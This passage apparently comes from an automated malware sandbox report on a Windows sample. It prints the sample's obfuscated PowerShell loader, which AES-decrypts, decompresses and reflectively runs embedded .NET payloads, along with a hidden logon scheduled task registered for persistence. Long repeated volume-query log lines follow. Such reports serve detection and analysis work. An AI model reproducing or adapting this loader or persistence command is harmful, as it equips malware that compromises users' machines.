tnioj($epehv){$iyroy=[system.security.cryptography.aes]::create();$iyroy.mode=[system.security.cryptography.ciphermode]::cbc;$iyroy.padding=[system.security.cryptography.paddingmode]::pkcs7;$iyroy.key=[system.convert]::($rtyv[8])('saaw/5aaxuahemfj4gdvf4efnk5mel+mrvinwcktw5a=');$iyroy.iv=[system.convert]::($rtyv[8])('5qrexrx1mz3ezx5v7wynkq==');$vcojp=$iyroy.($rtyv[2])();$vyqzb=$vcojp.($rtyv[3])($epehv,0,$epehv.length);$vcojp.dispose();$iyroy.dispose();$vyqzb;}function ummxi($epehv){$vtwcn=new-object system.io.memorystream(,$epehv);$wwnvp=new-object system.io.memorystream;$guujf=new-object system.io.compression.gzipstream($vtwcn,[io.compression.compressionmode]::($rtyv[11]));$guujf.($rtyv[10])($wwnvp);$guujf.dispose();$vtwcn.dispose();$wwnvp.dispose();$wwnvp.toarray();}$sqmzi=[system.io.file]::($rtyv[0])([console]::title);$fexoj=ummxi (tnioj ([convert]::($rtyv[8])([system.linq.enumerable]::($rtyv[6])($sqmzi, 5).substring(2))));$sgtuk=ummxi (tnioj ([convert]::($rtyv[8])([system.linq.enumerable]::($rtyv[6])($sqmzi, 6).substring(2))));[system.reflection.assembly]::($rtyv[5])([byte[]]$sgtuk).($rtyv[1]).($rtyv[13])($null,$null);[system.reflection.assembly]::($rtyv[5])([byte[]]$fexoj).($rtyv[1]).($rtyv[13])($null,$null); "Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" register-scheduledtask -taskname 'onenote 64476' -trigger (new-scheduledtasktrigger -atlogon) -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\network64476man.cmd') -settings (new-scheduledtasksettingsset -allowstartifonbatteries -hidden -executiontimelimit 0) -runlevel highest -forceJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\roaming\network64476man.cmd';$rtyv='rezykvadzykvlizykvneszykv'.replace('zykv', ''),'etumkntumktrtumkypotumkitumkntumkttumk'.replace('tumk', ''),'crigeoeaigeoteigeodigeoecigeorypigeotoigeorigeo'.replace('igeo', ''),'tghdlranghdlsghdlfghdloghdlrmghdlfighdlnalghdlbghdlloghdlckghdl'.replace('ghdl', ''),'ggynuegynutgynucugynurrgynuengynutpgynurgynuocegynusgynusgynu'.replace('gynu', ''),'loalbokdlbok'.replace('lbok', ''),'elrofderofdmerofdntarofdtrofd'.replace('rofd', ''),'shhcaplihhcathhca'.replace('hhca', ''),'frolqelmblqelalqelslqelelqel6lqel4lqelstlqelrinlqelglqel'.replace('lqel', ''),'mkropainkropmkropodkropukroplekrop'.replace('krop', ''),'cocpycpytcpycocpyc'.replace('cpyc', ''),'decwuerowuermprwuereswuerswuer'.replace('wuer', ''),'chqcmhahqcmnhqcmgeehqcmxthqcmenshqcmiohqcmnhqcm'.replace('hqcm', ''),'inpsjavopsjakpsjaepsja'.replace('psja', '');powershell -w hidden;function tnioj($epehv){$iyroy=[system.security.cryptography.aes]::create();$iyroy.mode=[system.security.cryptography.ciphermode]::cbc;$iyroy.padding=[system.security.cryptography.paddingmode]::pkcs7;$iyroy.key=[system.convert]::($rtyv[8])('saaw/5aaxuahemfj4gdvf4efnk5mel+mrvinwcktw5a=');$iyroy.iv=[system.convert]::($rtyv[8])('5qrexrx1mz3ezx5v7wynkq==');$vcojp=$iyroy.($rtyv[2])();$vyqzb=$vcojp.($rtyv[3])($epehv,0,$epehv.length);$vcojp.dispose();$iyroy.dispose();$vyqzb;}function ummxi($epehv){$vtwcn=new-object system.io.memorystream(,$epehv);$wwnvp=new-object system.io.memorystream;$guujf=new-object system.io.compression.gzipstream($vtwcn,[io.compression.compressionmode]::($rtyv[11]));$guujf.($rtyv[10])($wwnvp);$guujf.dispose();$vtwcn.dispose();$wwnvp.dispose();$wwnvp.toarray();}$sqmzi=[system.io.file]::($rtyv[0])([console]::title);$fexoj=ummxi (tnioj ([convert]::($rtyv[8])([system.linq.enumerable]::($rtyv[6])($sqmzi, 5).substring(2))));$sgtuk=ummxi (tnioj ([convert]::($rtyv[8])([system.linq.enumerable]::($rtyv[6])($sqmzi, 6).substring(2))));[system.reflection.assembly]::($rtyv[5])([byte[]]$sgtuk).($rtyv[1]).($rtyv[13])($null,$null);[system.reflection.assembly]::($rtyv[5])([byte[]]$fexoj).($rtyv[1]).($rtyv[13])($null,$null); "
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" register-scheduledtask -taskname 'onenote 64476' -trigger (new-scheduledtasktrigger -atlogon) -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\network64476man.cmd') -settings (new-scheduledtasksettingsset -allowstartifonbatteries -hidden -executiontimelimit 0) -runlevel highest -force
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A36DBEC cpuid 0_2_00007FF65A36DBEC
    Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00007FF65A37A24C
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
